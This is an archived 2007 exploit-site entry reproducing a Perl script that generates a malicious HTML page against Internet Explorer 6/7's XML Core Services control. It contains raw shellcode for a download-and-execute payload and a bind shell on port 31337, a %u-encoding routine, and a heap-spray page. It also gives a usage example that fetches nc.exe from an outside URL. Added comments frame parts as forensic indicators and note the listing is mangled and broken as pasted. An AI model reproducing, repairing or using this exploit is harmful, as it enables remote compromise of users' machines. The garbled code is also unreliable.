MS IE 6/7 (XML Core Services) Rem0t3 c0d3 Executi0n Expl0it-vulnerability warning-the black bar safety net

2007-03-15T00:00:00
ID MYHACK58:62200714555
Type myhack58
Reporter 佚名
Modified 2007-03-15T00:00:00

Description

! perl/bin

Gr33tZ => O. G. | chaos | sakkure | nukedx | xoron | Stansar ^^

(c)cnhacker.com

MS IE 6/7 (XML Core Services) Rem0t3 c0d3 Executi0n Expl0it

usage : perl wow.pl <shell> <outputting_file>

FR0M => www.cnhacker.com

cnhacker attack group

n0t => binding port 3 1 3 3 7 : )

SHELL => BIND SHELL => -b

SHELL => DOWN & EXEC => -d

# Argument check and the first of the two payload strings of this HTML
# generator. Reproduced verbatim from the archive page: the listing is
# whitespace-mangled as pasted and does not compile in this form; nothing
# below is corrected.
#   ARGV[0]  -d (download-and-execute) or -b (bind shell); the selection
#            itself happens further down in the file
#   ARGV[1]  path of the HTML file to write ($html)
#   ARGV[2]  URL string appended to $shcode (used by the -d mode)
# $shcode is the -d payload. Two plaintext markers are visible inside the
# escaped bytes: "urlmon.dll" (\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C) and
# "C:\U.exe" (\x43\x3A\x5C\x55\x2e\x65\x78\x65), so a host that ran this
# sample would presumably show a file written as C:\U.exe — a practical
# forensic indicator for it, alongside the URL given as ARGV[2].
use I:Handle; if (@ARGV < 2) { print' Gr33tZ = O. G. | chaos | sakkure | nukedx | xoron | Stansar ^^ MS IE 6/7 (XML Core Services) Rem0t3 c0d3 Executi0n Expl0it

' and print "usage : perl $0 <sh3ll> <outputting_html> <url or null>\n"; print' -d => Download And Exec. Shell -b => Win32 Bind Shell (port => 3 1 3 3 7) if You Select-d You Must Enter File_url or You Select-b Null ^^ '; print "Example : perl $0-b laz.html \n"; print "Example : perl $0-d laz.html http://blah.com/nc.exe \n" and exit; } $html = $ARGV[1]; my $shcode = "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x 76\x20\x03". "\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74". "\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E". "\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03". "\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C". "\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40". "\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C". "\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC". "\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F". "\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB". "\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83". "\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF". "\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF". "$ARGV[2]";

[win32_bind sh3llc0d3] LPORT=3 1 3 3 7 thx => www.metasploit.com

# Second payload string, mode selection, and the head of the generated page.
# Verbatim from the archive page (whitespace-mangled, and several escapes in
# the byte string are corrupted as pasted); not corrected here.
# $shall is the -b payload; the note above it attributes it to Metasploit
# win32_bind with LPORT 31337, so an unexpected listener on TCP 31337 on a
# workstation is the host-side observable for that mode.
# Mode handling: -d accepts ARGV[2] when it matches /http/ or /ftp/ — an
# unanchored substring test, not the "must start with http:// or ftp://"
# check the error text describes; -b reaches label tamam from both branches
# of its if/else, i.e. ARGV[2] is ignored.
# The page written from here embeds an <object> whose classid is
# {88d969c5-f192-11d4-a65f-0040963251e5} (presumably the XML Core Services
# XMLHTTP control the title refers to) and calls its open() with Array
# arguments inside try/catch. That classid in an <object> tag, combined with
# the unescape()-built spray emitted further down, is the pattern to look for
# in proxy/IDS logs and browser cache when hunting for this sample.
my $shall = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61". "\x19\x4c\x17\x83\xeb\xfc\xe2\xf4\x9d\x73\xa7\x5a\x89\xe0\xb3\xe8". "\x9e\x79\xc7\x7b\x45\x3d\xc7\x52\x5d\x92\x30\x12\x19\x18\xa3\x9c". "\x2e\x01\xc7\x48\x41\x18\xa7\x5e\xea\x2d\xc7\x16\x8f\x28\x8c\x8e". "\xcd\x9d\x8c\x63\x66\xd8\x86\x1a\x60\xdb\xa7\the XE3\x5a\x4d\x68\x3f". "\x14\xfc\xc7\x48\x45\x18\xa7\x71\xea\x15\x07\x9c\x3e\x05\x4d\xfc". "\x62\x35\xc7\x9e\x0d\x3d\x50\x 76\xa2\x28\x97\x73\xea\x5a\x7c\x9c". "\x21\x15\xc7\x67\x7d\xb4\xc7\x57\69\x47\x24\x99\x2f\x17\xa0\x47". "\x9e\xcf\x2a\x44\x07\x71\x7f\x25\x09\x6e\x3f\x25\x3e\x4d\xb3\xc7". "\x09\xd2\xa1\xeb\x5a\x49\xb3\xc1\x3e\x90\xa9\x71\xe0\xf4\x44\x15". "\x34\x73\x4e\xe8\xb1\x71\x95\x1e\x94\xb4\x1b\xe8\xb7\x4a\x1f\x44". "\x32\x4a\x0f\x44\x22\x4a\xb3\xc7\x07\x71\x36\x7e\x07\x4a\xc5\xf6". "\xf4\x71\xe8\x0d\x11\xde\x1b\xe8\xb7\x73\x5c\x46\x34\xe6\x9c\x7f". "\xc5\xb4\x62\xfe\x36\xe6\x9a\x44\x34\xe6\x9c\x7f\x84\x50\xca\x5e". "\x36\xe6\x9a\x47\x35\x4d\x19\xe8\xb1\x8a\x24\xf0\x18\xdf\x35\x40". "\x9e\xcf\x19\xe8\xb1\x7f\x26\x73\x07\x71\x2f\x7a\xe8\xfc\x26\x47". "\x38\x30\x80\x9e\x86\x73\x08\x9e\x83\x28\x8c\xe4\xcb\xe7\x0e\x3a". "\x9f\x5b\x60\x84\xec\x63\x74\xbc\xca\xb2\x24\x65\x9f\xaa\x5a\xe8". "\x14\x5d\xb3\xc1\x3a\x4e\x1e\x46\x30\x48\x26\x16\x30\x48\x19\x46". "\x9e\xc9\x24\xba\xb8\x1c\x82\x44\x9e\xcf\x26\xe8\x9e\x2e\xb3\xc7". "\xea\x4e\xb0\x94\xa5\x7d\xb3\xc1\x33\xe6\x9c\x7f\x91\x93\x48\x48". "\x32\xe6\x9a\xe8\xb1\x19\x4c\x17"; if ($ARGV[0] eq '-d') { $sh = $shcode; if ($ARGV[2] =~ /http/) {goto tamam;} if ($ARGV[2] =~ /ftp/) {goto tamam;} else { print' [-] You Must Start http:// or ftp:// ' and exit; } } if ($ARGV[0] eq '-b') { $sh = $shall; if (!$ ARGV[2] =~ /w/) {goto tamam;} else { goto tamam; } } tamam: for(;;) { my $kod = <<KOD <html xmlns="http://www.w3.org/1999/xhtml"> <body> <object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}" > </object> <script> var obj = null; function the Trojan() { obj = document. 
getElementById('target'). object;

try { obj. open(new Array(),new Array(),new Array(),new Array(),new Array()); } catch(e) {};

KOD ; $tamkod = dongu($sh);

__citati0n t0 YAG KOHHA's WebViewFolderIcon Expl0itZ___

# dongu — encode a byte string as JavaScript %uXXXX escapes for unescape().
# Verbatim from the archive page (mangled as pasted; it does not compile in
# this form) and kept as is. The citation line above credits the routine to
# the WebViewFolderIcon exploit.
#   $data  raw byte string (the selected payload)
#   $mode  'LE' (default): each byte pair is emitted low byte first, i.e.
#          %u<c2><c1>; any other value emits %u<c1><c2>
# An odd-length input has its last byte duplicated so the pairs line up.
# Returns the concatenated escape string. Its output is what ends up inside
# the generated page's unescape("...") call, so long runs of %u escapes in
# script content are the textual trace this encoder leaves behind.
sub dongu { my $data = shift; my $mode = shift() || 'LE'; my $code = ";

my $idx = 0;

if (length($data) % 2 != 0) { $data .= substr($data, -1, 1); }

while ($idx < length($data) - 1) { my $c1 = ord(substr($data, $idx, 1)); my $c2 = ord(substr($data, $idx+1, 1)); if ($mode eq 'LE') { $code .= sprintf('%%u%. 2x%. 2x', $c2, $c1); } else { $code .= sprintf('%%u%. 2x%. 2x', $c1, $c2); } $idx += 2; }

return $code; }

_____________

# Remainder of the generated page and the file write. Verbatim from the
# archive page (heredoc terminators are collapsed onto the opening lines as
# pasted); not corrected here.
# $sh3ll: unescape() of a run of "%u9090" followed by the encoded payload
# ($tamkod) from dongu().
# $tam: a heap spray — nps starts as unescape("%u0D0D%u0D0D") and is doubled
# until it approaches 0x400000 bytes, then mm[] is filled with
# (0x12000000-0x400000)/0x400000 copies of nps+sh; afterwards obj.open() is
# called with Object arguments and setRequestHeader() is called repeatedly
# with the numeric value 0x12345678, which is presumably the trigger against
# the embedded control. For detection, the repeated %u0D0D / %u9090
# unescape() strings and a run of setRequestHeader() calls with a numeric
# second argument are the characteristic features of this generated HTML.
# File output uses a bareword handle and the two-argument open form with the
# path taken from the command line ($html). exit(1) at the end of the body
# means the surrounding for(;;) loop runs exactly once.
my $sh3ll = <<SHELL sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" + "%u9090%u9090$tamkod"); SHELL ; my $tam = <<TAM sz = sh. length * 2; npsz = 0x400000-(sz+0x38); nps = unescape ("%u0D0D%u0D0D"); while (nps. length*2<npsz) nps+=nps; ihbc = (0x12000000-0x400000)/0x400000; mm = new Array(); for (i=0;i<ihbc;i++) mm[i] = nps+sh;

obj. open(new Object(),new Object(),new Object(),new Object(), new Object());

obj. setRequestHeader(new Object(),'......'); obj. setRequestHeader(new Object(),0x12345678); obj. setRequestHeader(new Object(),0x12345678); obj. setRequestHeader(new Object(),0x12345678); obj. setRequestHeader(new Object(),0x12345678); obj. setRequestHeader(new Object(),0x12345678); obj. setRequestHeader(new Object(),0x12345678); obj. setRequestHeader(new Object(),0x12345678); obj. setRequestHeader(new Object(),0x12345678); obj. setRequestHeader(new Object(),0x12345678); obj. setRequestHeader(new Object(),0x12345678); obj. setRequestHeader(new Object(),0x12345678); } </script> <body >

</body></html> TAM ; open X, ">$html" or die "[-] $html the File Create Failed \n" and exit; print X $kod; print X $sh3ll; print X $tam; X->close; sleep(1); if (-e $html) { print "[+] $html File Is Created ^^\n"; } exit(1); }